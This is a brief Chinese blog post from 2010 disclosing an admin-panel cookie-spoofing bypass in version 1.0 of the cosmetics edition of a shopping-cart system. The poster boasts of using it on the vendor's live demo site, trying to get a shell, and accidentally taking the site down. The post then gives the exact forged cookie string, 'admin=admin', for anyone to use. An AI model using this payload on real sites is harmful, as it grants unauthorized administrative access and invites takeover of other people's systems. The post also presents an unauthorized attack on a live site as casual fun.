浏览模式: 标准 | 列表Tag:三顾
三顾购物系统化妆品版 v1.0 后台cookie欺骗漏洞
Submitted by admin
2010, July 19, 9:47 AM
程序:三顾购物系统化妆品版 v1.0
其他版本未试
刚刚在官方演示站上搞,进了后台要拿shell,结果备份数据那儿搞错了,晕,官方被我搞挂了,不试了,小小漏洞一枚,送给大家了。
cookies: ASPSESSIONIDAACBDCBQ=BMAFNPMBNLDEFDHHLGPCDMJL; www3gushopcom=admin=admin; OrderBy; ShowType; prodpage=1